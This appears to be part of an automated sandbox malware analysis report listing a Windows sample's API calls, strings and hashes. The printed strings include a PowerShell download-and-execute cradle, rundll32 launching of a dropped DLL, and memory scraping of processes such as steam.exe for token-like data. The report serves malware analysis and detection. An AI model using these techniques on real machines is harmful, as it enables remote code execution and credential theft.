                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00412560
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcatlstrlen$ExecuteShellSystemTimememset
                                                                                                                                                                                                                                                                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      • API String ID: 1675527290-38637897
                                                                                                                                                                                                                                                                                      • Opcode ID: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                      • Instruction ID: 334dd5afd32dd1eb1b8252b2cfcba07153a0a01eb84f6ed827c6dd8a75e550bd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6418A303103146BD654BB6299A6BAF7A595BC4758F40045E784B1F283CEBC5CC5C7EE
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411E21
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00411E3C
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411E4B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$Heap$AllocCloseHandleOpenTerminatewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %hs
                                                                                                                                                                                                                                                                                      • API String ID: 2756667156-2783943728
                                                                                                                                                                                                                                                                                      • Opcode ID: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                      • Instruction ID: 5d8af7fbd58c0c14971e09abe29c4d5a15048916ed38c030ba04a2c092a42a15
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E731C130608341ABD3109F60ED48BAFB7E9EFD5744F00591EF985821A0EB7499C4CA5B
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F899
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F8D6
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                      • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00064000,00000000,?,?,00000000), ref: 0040FB5E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strlen$MemoryProcessQueryReadVirtualmemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3741619940-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                      • Instruction ID: 5f3e5458c0cb4e82bdfb47d3dacbfc32efe29669a25e4631f25e2303d30cacff
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0A159716083018BD328DF24D891A3BB7E2FF94704F14893EE58697791E738E849CB5A
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00412374
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internetlstrcpy$CloseFileHandle$Openlstrcatlstrlen$CreateExecuteReadShellSystemTimeWritememset
                                                                                                                                                                                                                                                                                      • String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                      • API String ID: 1030512983-3594953769
                                                                                                                                                                                                                                                                                      • Opcode ID: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                      • Instruction ID: 94f81c9545e4cc3746d51ce8cbcf5f5300d4dbcdb4f20de0f2bf9a4aeae790fb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87815170A0021857DB14FBB2CDEAAEF7B69AF44748F40145EB4066B182DEBC5DC5C7A8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041D5E3
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041D611
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041D647
                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D653
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D66F
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D6D8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$File$PointerSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3240274019-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                      • Instruction ID: 199ab82a49c152330d2498684869e6748a8235d6c4fc3d2a3f6766ec5b303acd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8410EB1904705AED324CF25C845B7BBBE8FF84348F108A2EF5D69A291E774E486CB14
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040257A
                                                                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040258E
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 004025AD
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 004025E7
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 00402608
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040260D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??2@$??3@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemcpy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3928403917-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e7e14c953d7065ddfbc83dcc624144d79b7d133a95972969d59e1279a8bc6929
                                                                                                                                                                                                                                                                                      • Instruction ID: 52b5ec612f7533a417f76914090347e108d7196820fc58126e476e1f6b56743e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7e14c953d7065ddfbc83dcc624144d79b7d133a95972969d59e1279a8bc6929
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 152107B26006011BCB24AE7D9E9842FB7E9DF953107150B3FF452D77C1E6B9D884829D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %d/%d/%d %d:%d:%d
                                                                                                                                                                                                                                                                                      • API String ID: 1243822799-1073349071
                                                                                                                                                                                                                                                                                      • Opcode ID: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                      • Instruction ID: a51e7d71a8269122c591f01167c988a4a4a74b4f43d1a07cc1a506d8f3a3d197
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CF0E9619042207BE300175ADC49D3BB7ECEFC5B66F00450AF9C8861C0E2755C60C3F1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • memchr.MSVCRT ref: 0040F7F6
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F870
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F884
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_., xrefs: 0040F7A8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??3@_invalid_parameter_noinfo_noreturnmemchrmemmove
                                                                                                                                                                                                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
                                                                                                                                                                                                                                                                                      • API String ID: 1808541760-3714209346
                                                                                                                                                                                                                                                                                      • Opcode ID: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                      • Instruction ID: e5761b3670b8c8960a25c8c0341e9f71b1cf11a4bb1c116d5b70eba03c88b707
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9931E4326043014BD734EE28998476BB6E5EF81314F54493EF8926B7C2D378DC48879A
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strtok_s
                                                                                                                                                                                                                                                                                      • String ID: |
                                                                                                                                                                                                                                                                                      • API String ID: 3330995566-2343686810
                                                                                                                                                                                                                                                                                      • Opcode ID: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                      • Instruction ID: 7cbb43b9c3c311997e94ccc4c59da73614e136a49788afc63ea09a6e546b0ca8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F721D7741403099BD734DB21ED44BAB7365FB80308F04891ED91647741E77DE9AAC6A5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411ED0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411ED0: Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411ED0: Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411ED0: StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040FD50: strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                                      • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,steam.exe), ref: 004100BF
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,steam.exe), ref: 004100D1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??3@ProcessProcess32$CreateFirstMemoryNextOpenReadSnapshotToolhelp32_invalid_parameter_noinfo_noreturnmemsetstrcpystrlen
                                                                                                                                                                                                                                                                                      • String ID: steam.exe
                                                                                                                                                                                                                                                                                      • API String ID: 3498801153-2826358650
                                                                                                                                                                                                                                                                                      • Opcode ID: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                      • Instruction ID: c95efb34c5d0572b28db4c51e5027ad35194888a113b08cfb57a14cf0263e5e6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edf7ab5e709519ca9690a9e51a5b00c792588e82c5ef7c00e0374f79e830f1f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4F0F9B1A003082BEA10753A7CC5AFB7948DA55758F040537FD5597342F59B8CD402BA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041D784
                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D78E
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D7A9
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D80E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                      • Instruction ID: 931dc2256524a03f6c6b52008fe1b6fe3cfd9aca74429015198684bf78445e10
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0318BB2904B109AE329CF29C8547B7BBE4FF84340F008A2EF5D69A250E779E485DB55
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 004113C9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: SystemTimelstrcpylstrlen
                                                                                                                                                                                                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                                                                                                                                                                                                                                                                      • API String ID: 3844799746-2529986050
                                                                                                                                                                                                                                                                                      • Opcode ID: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                      • Instruction ID: 0ad9b0325b1aa92503a801a233b5e7783d800f0c675173fcafeea2b792c599d4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 066908f056dc1f1dbb91ebc683ebbcf5ffb8e290bff7efcc6e8575583ae2dc61
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F110330304200ABC704AB76A81667FB7A7EBC5304F45507EF442C73A1DE389C8087A5